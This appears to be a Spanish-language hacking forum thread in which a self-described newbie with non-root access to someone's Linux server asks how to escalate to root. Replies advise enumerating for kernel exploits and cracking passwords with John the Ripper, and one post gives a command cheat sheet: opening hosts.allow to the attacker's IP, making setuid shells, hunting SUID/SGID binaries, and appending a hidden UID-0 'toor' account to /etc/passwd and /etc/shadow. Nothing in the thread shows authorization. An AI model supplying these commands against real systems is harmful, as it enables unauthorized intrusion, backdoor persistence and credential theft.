Tema destacado: Deseas probar algunas mejoras a la interfaz del foro? Prueba cake! acerca de
 Autor
|
Tema: Escalar posiciones en linux (Leído 4,965 veces)
|
juandiex
 Desconectado
Mensajes: 46
|
Hola, soy un poco newbie en este, pero digamos que ya tengo acceso a un servidor con linux, con un usuario no root, como puedo escalar posiciones, hay alguna herramienta la cual pueda usar. Los rootkits solo sirven para ponerlos una vez que ya tengo permisos de root verdad? Pero de que otra forma puedo escalar posiciones.
|
|
|
|
|
En línea
|
|
|
|
Ambolius
Desconectado
Mensajes: 1.338
/España/Guadalajara
|
Consigue toda la informacion que puedas del servidor Linux. Que kernel usa, que servicios corre, cuales son sus versiones...
Busca bugs locales que puedan tener la maquina acorde a la informacion que conseguiste anteriormente, y explotalos.
Los rootkits, se ejecutan cuando tienes la cuenta de superusuario, ya que cambian aspectos internos del sistema (Bueno, dependiendo del rootkit; Alguno solamente ejecuta un backdoor con permisos de usuario que lo ejecutó.) como por ejemplo la estructura de los comandos, una puerta trasera, ejecucion de procesos automatizados...
|
|
|
|
|
En línea
|
Un informático a otro:
- ¿Cuantos eran los Dálmatas?
- 101.
- Por el culo te la hinco.
|
|
|
juandiex
Desconectado
Mensajes: 46
|
Bueno, es de la informacion ya tengo recopilada bastante, se el kernel, tambien que servicios, entonces creo que voy a partir a travez de eso.
|
|
|
|
|
En línea
|
|
|
|
juandiex
Desconectado
Mensajes: 46
|
Bueno, no he avanzado mucho, ya va algunos dias con el john the ripper y a sacado algunas claves pero no ha podido sacar la del root. Vulnerabilidades no las he encontrado muchas o a lomenos no algunas que pueda usar un newbie, pero si laguien me puede ayudar a encontrar vulnerabilidades que se puedan explotar estaria agradecido. El kernel 2.4.26 creo que es debian, a algun derivado de este.
|
|
|
|
|
En línea
|
|
|
|
fandango
Another
Ex-Staff
Desconectado
Mensajes: 1.953
Powered By Slackware!
|
Pues como dijo Ambolius busca exploits para subir previlegios, fijate si las cuentas que has crackeado tienen mas previlegios que la que tienes, postea los exploits que encontraste y que son para ese sistema, tal vez podramos ayudarte a usarlo.
Saludos.
|
|
|
|
|
En línea
|
|
|
|
|
zhyzura
|
fijate en los servicios que tiene para poder explotarlos.
¿dices que ya tienes el archivo que contiene la pass de root?
quizas no la puedes sacar por que esta en shadow, ocupas dos archivos para lograrlo (/etc/password /etc/shadow)
ya que los tengas solo realiza el "unshadow"
saludos
|
|
|
|
|
En línea
|
|
|
|
|
el-brujo
|
Te dejo aquí mis apuntes que estoy tomando en estos últimos días jejeje.
-Darme acceso
echo ' miip' >> /etc/hosts.allow
cat /dev/null > /etc/hosts.deny
-Shell con permisos root (buscar primero programa con setuserid)
cp /bin/sh /tmp
chmod 4555 /tmp/sh
id
wc -l /etc/shadow
/tmp/sh
id
wc -l /etc/shadow
-Problema setuserid
cp 'wich id'
chown root ./id
chmod 755 ./id ; chmod u+s ./id
id
./id
-Programas setxid
find / \( -perm -02000 -o perm -04000 \) -ls
find / (-local -o -prune ) ( -perm -004000 -o -perm -002000 )-typef -print
find / -perm -004000 -o -perm -002000 -print
SUID
find / -type f -perm -04000 -ls
SGID
find / -type f -perm -02000 -ls
-Ejecutar comandos shell
./tal
exec
sh tal
sh -i ejecutable
bash -i ejecutable
csh -i ejecutable
ash -i ejecutable
-Enlaces simbólicos con un setxid
ln -s /tmp/toma /etc/shadow
cat /etc/shadow
Ejemplo?¿
ln -s /etc/passwd /tmp/seuid
-Añadir Cuenta UID:0
echo 'toor:x:0:0::/:/bin/bash' >>/etc/passwd
echo 'toor:h311hrh9kimg::::::'>>/etc/shadow
- Crear shell
#!/bin/bash
/bin/bash -i
|
|
|
|
|
En línea
|
"elhacker.net es único, por eso no fabrica para otras marcas" - Prohibido prohibir  |
|
|
strike-maXter
Desconectado
Mensajes: 180
|
el kernel que especificas no tiene que ser de un Debian, es mas, lo puede tener cualquier distro puesto que es el nucleo del sistema operativo.
salu2!
|
|
|
|
|
En línea
|
Sultan de la Red, Guardián de la Noche. Solitario Guerrero y Secuaz de la Muerte.
|
|
|
deadlock
Desconectado
Mensajes: 11
|
Buenas, refloto el hilo porque hay una cosa que no me entra en la cabeza...
Para poder leer el /etc/shadow se tiene que ser root, o pertenecer al grupo del root. He intentado ejecutar el john sobre el shadow i no he conseguido nada. Porque me dice que no tengo permisos de lectura del archivo.
Es que se puede conseguir leer shadow de otra forma siendo usuario, o como lo has hecho?
Saludos!
|
|
|
|
|
En línea
|
|
|
|
|
|
unsleep
Desconectado
Mensajes: 5
|
no me digais que si le hago un enlace al shadow lo podria leer porque me muero !!! xD
|
|
|
|
|
En línea
|
|
|
|
_aaa_
Desconectado
Mensajes: 83
Human knowledge belongs to the world
|
Lo dudo mucho, sigues sin tener permisos... si la contraseña del root está ahí creo que por ese camino no vas a conseguir mucho...
|
|
|
|
|
En línea
|
|
|
|
|
zhyzura
|
Buenas, refloto el hilo porque hay una cosa que no me entra en la cabeza...
Para poder leer el /etc/shadow se tiene que ser root, o pertenecer al grupo del root. He intentado ejecutar el john sobre el shadow i no he conseguido nada. Porque me dice que no tengo permisos de lectura del archivo.
Es que se puede conseguir leer shadow de otra forma siendo usuario, o como lo has hecho?
Saludos!
yo los he sacado usando un live-cd  P.D: muy buen apunte Brujo, recuerda agregar este post al recopilatorio de post interesantes de este subforo 
|
|
|
|
|
En línea
|
|
|
|
CERRAJERO.
Desconectado
Mensajes: 37
.....EL CERRAJERO....
|
....eee.. bueno yo si e podido leer en servidores el shadow, y el passwd, el q no se puede leer es el shadow-, y el passwd- (sin iniciar como root).... ahora una pregunta ... q diferencia hay entre el passwd y el passwd-, y entre el shadow y el shadow-...? si alguien me puede ayudar en esa duda se lo agradeceria... gracias de antemano...  ah! si alguien me puede dar la direccion de donde bajar el crack para descifrar el shadow tambien se lo agradeceria .. jeje |
|
|
|
|
En línea
|
____prefiero morir de pie ante los muros de troya, que vivir arrodillado ante un sistema podrido y cionista_____
|
|
|
pepeluxx
Desconectado
Mensajes: 340
Todos los días se aprende algo nuevo
|
Bueno, no he avanzado mucho, ya va algunos dias con el john the ripper y a sacado algunas claves pero no ha podido sacar la del root.
Si quieres que vaya mas rapido, puesto que ya tienes unas cuantas claves, porque no vacias el fichero passwd y dejas solo la de root que es la que te interesa? el john te lo agredecera 
|
|
|
|
|
En línea
|
|
|
|
|
 |
